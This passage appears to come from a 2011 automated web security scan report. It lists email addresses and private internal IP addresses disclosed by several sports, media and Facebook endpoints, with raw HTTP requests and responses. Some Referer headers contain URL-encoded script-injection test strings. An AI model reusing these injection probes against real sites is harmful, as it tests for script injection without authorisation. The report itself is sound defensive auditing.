21.18. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The following email address was disclosed in the response:

kindom223@yahoo.com

Request

Response

21.19. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/3/2205973/a-message-from-the-rest-of-us

Issue detail

The following email address was disclosed in the response:

kindom223@yahoo.com

Request

Response

21.20. http://www.mavsmoneyball.com/fanposts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/fanposts

Issue detail

The following email address was disclosed in the response:

kindom223@yahoo.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:43 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "4976aa6a1687ee1c27140bfb9454d5a0"
X-Runtime: 146
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 52503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<a href=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\\\\"+
"\\\\\\\\\\\\\\\\mailto:kindom223@yahoo.com\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"+
"\\\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\ title=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"+
"\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\""+
"\\\\\\\\\\
...[SNIP]...

21.21. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The following email address was disclosed in the response:

kindom223@yahoo.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:14:03 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Status: 200
ETag: "820fa21457f0d5549aec0bd131b34a77"
X-Runtime: 52
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate
Via: 1.1 sbnation.com
Vary: Accept-Encoding
Content-Length: 32409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<a href=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\\\\"+
"\\\\\\\\\\\\\\\\mailto:kindom223@yahoo.com\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"+
"\\\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\ title=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"+
"\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\""+
"\\\\\\\\\\
...[SNIP]...

21.22. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/global/music/modules/followUs/js/index.jhtml

Issue detail

The following email address was disclosed in the response:

tips@mtvmoviesblog.com

Request

GET /global/music/modules/followUs/js/index.jhtml?promoAreaName=follow_us_mtvmoviesblog&external=true HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1307963945|session#1307963884869-321358#1307965745

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 81b04612345216d47ce1b19313561bc
Last-Modified: Mon, 13 Jun 2011 11:18:50 GMT
Content-Type: text/html
Content-Length: 1981
Cache-Control: max-age=114
Date: Mon, 13 Jun 2011 11:22:44 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div class=\"mdl mdl_followUs\"> <div class=\"h-wrap group\"> <h2 class=\"h-sub2 group\"> <span>Follow Us</span> </h2> </div> <ol class=\"lst ph
...[SNIP]...
<a href=\"mailto:tips@mtvmoviesblog.com \" target=\"othersite\">
...[SNIP]...
<a href=\"mailto:tips@mtvmoviesblog.com \" target=\"othersite\">
...[SNIP]...

21.23. http://www.nba.com/js/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/js/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /js/controls.js HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_vi=[CS]v1|26FAF7070501327A-60000100E0022607[CE]; s_sq=%5B%5BB%5D%5D; JSESSIONID=78DF53F9F3A295B19B98E52724C9D0C9

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 30 Oct 2009 20:40:35 GMT
Accept-Ranges: bytes
Content-Length: 34787
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:10:56 GMT
Connection: close

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

21.24. http://www.nba.com/js/cookieFunctions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/js/cookieFunctions.js

Issue detail

The following email address was disclosed in the response:

bdortch@hidaho.com

Request

GET /js/cookieFunctions.js HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_vi=[CS]v1|26FAF7070501327A-60000100E0022607[CE]; s_sq=%5B%5BB%5D%5D; JSESSIONID=78DF53F9F3A295B19B98E52724C9D0C9

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 30 Oct 2009 20:40:44 GMT
Accept-Ranges: bytes
Content-Length: 7275
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:10:58 GMT
Connection: close

//
// Cookie Functions -- "Night of the Living Cookie" Version (25-Jul-96)
//
// Written by: Bill Dortch, hIdaho Design <bdortch@hidaho.com>
// The following functions are released to the publ
...[SNIP]...

21.25. http://www.nba.com/js/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/js/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

GET /js/dragdrop.js HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_vi=[CS]v1|26FAF7070501327A-60000100E0022607[CE]; s_sq=%5B%5BB%5D%5D; JSESSIONID=78DF53F9F3A295B19B98E52724C9D0C9

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 30 Oct 2009 20:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31174
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:10:56 GMT
Connection: close

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...

21.26. http://www.twackle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twackle.com
Path:	/

Issue detail

The following email address was disclosed in the response:

twackle@reea.net

Request

Response

21.27. http://www.twackle.com/headlines previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twackle.com
Path:	/headlines

Issue detail

The following email address was disclosed in the response:

twackle@reea.net

Request

Response

21.28. http://www.twackle.com/javascripts/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twackle.com
Path:	/javascripts/all.js

Issue detail

The following email addresses were disclosed in the response:

sammi@oriontransfer.co.nz
tdd@tddsworld.com

Request

GET /javascripts/all.js?1307717390 HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://www.twackle.com/fansided/General_Twackle_Widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 111
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:02:50 GMT
Last-Modified: Fri, 10 Jun 2011 14:49:50 GMT
Server: nginx/1.0.2
Via: 1.1 varnish
X-Varnish: 1493695549 1493688052
Content-Length: 266111
Connection: keep-alive

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

22. Private IP addresses disclosed previous next
There are 134 instances of this issue:

http://api.connect.facebook.com/static/v0.4/client_restserver.php
http://connect.facebook.net/en_US/all.js
http://desmond.yfrog.com/Himg737/scaled.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://graph.facebook.com/1599594030/picture
http://graph.facebook.com/680122358/picture
http://graph.facebook.com/695375004/picture
http://graph.facebook.com/701741542/picture
http://justjared.buzznet.com/favicon.ico
http://justjared.buzznet.com/favicon.ico
http://media.expedia.com/ads/travelhook/travelhook.js
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.connect.facebook.com/connect.php
http://static.ak.connect.facebook.com/connect.php/en_US
http://static.ak.connect.facebook.com/connect.php/en_US
http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css
http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js
http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif
http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/nXqcdeyQ5vr.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/XcVjTLuzQ2O.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/dYwII2uSVbM.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/-uzFkmw0aKD.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/4zEIrWluYBR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/nIpljRV8xB5.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/t4syXsnV4WE.js
http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/widgets/like.php
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act
http://www35.glam.com/gad/glamadapt_jsrv.act

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.connect.facebook.com
Path:	/static/v0.4/client_restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.58.106

Request

GET /static/v0.4/client_restserver.php?r=1307382546 HTTP/1.1
Host: api.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 665
Content-Type: text/html; charset=utf-8
Expires: Tue, 12 Jun 2012 11:33:52 GMT
X-FB-Server: 10.32.58.106
X-Cnection: close
Date: Mon, 13 Jun 2011 11:33:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Host Page</title>
</head
...[SNIP]...

22.2. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.218.110

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
If-None-Match: "2440e53f3f517e7b1591e6a9055391ff"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "2c9086b6572ca464ff3c3a07121f199b"
X-FB-Server: 10.27.218.110
X-Cnection: close
Content-Length: 124772
Cache-Control: public, max-age=717
Expires: Mon, 13 Jun 2011 11:44:44 GMT
Date: Mon, 13 Jun 2011 11:32:47 GMT
Connection: close
Vary: Accept-Encoding

/*1307924198,169597550,JIT Construction: v390928,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

22.3. http://desmond.yfrog.com/Himg737/scaled.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://desmond.yfrog.com
Path:	/Himg737/scaled.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.101.1.11

Request

GET /Himg737/scaled.php?tn=0&server=737&filename=224e.jpg&xsize=640&ysize=640 HTTP/1.1
Host: desmond.yfrog.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Mon, 13 Jun 2011 11:02:09 GMT
Content-Type: image/jpeg
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=5184000,max-stale
Content-Disposition: inline; filename=224e.jpg
Content-Length: 79281
X-Varnish: 1783052334 1775450316
Via: 1.1 varnish
age: 0
X-Varnish-Hits: 10601
X-Varnish-IP: 10.101.1.11
X-Varnish-Port: 17001

......JFIF.....H.H.....C...................

.............. ("..&...#0$&*+-.-."251,5(,-,...C..... .....,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........................................
...[SNIP]...

22.4. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.141.77

Request

GET /safe_image.php?d=8bb76b2f66381351767b206afa36958a&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fa%2F08%2F619%2Fa0861925-04d5-5ef7-b363-72d299322009-revisions%2F4dd4975b75ba4.preview-100.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.43.141.77
X-Cnection: close
Content-Length: 3260
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 14 Jun 2011 11:13:13 GMT
Date: Mon, 13 Jun 2011 11:13:13 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.5. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.130.130

Request

GET /safe_image.php?d=93ffd81fd88667345a394d2c16172e1a&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fd%2Fb7%2F5ac%2Fdb75accf-78c1-500f-a42a-6868496bc556-revisions%2F4dd5a38ed1682.preview-100.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.136.130.130
X-Cnection: close
Content-Length: 1992
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 14 Jun 2011 11:13:13 GMT
Date: Mon, 13 Jun 2011 11:13:13 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.6. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.101.50

Request

GET /safe_image.php?d=3809569cb18eeb69b652e3544c276491&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fa%2Fb5%2F073%2Fab5073a4-854d-11e0-9f64-001cc4c03286-revisions%2F4dda77017f5c7.preview-100.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.101.50
X-Cnection: close
Content-Length: 2037
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 14 Jun 2011 11:13:13 GMT
Date: Mon, 13 Jun 2011 11:13:13 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.7. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.234.58

Request

GET /safe_image.php?d=301102cc30e02a7b990de235cc649a9e&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F7%2F2%2F1%2F198127%2Fcuts%2Fsitting-hand-on-head_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
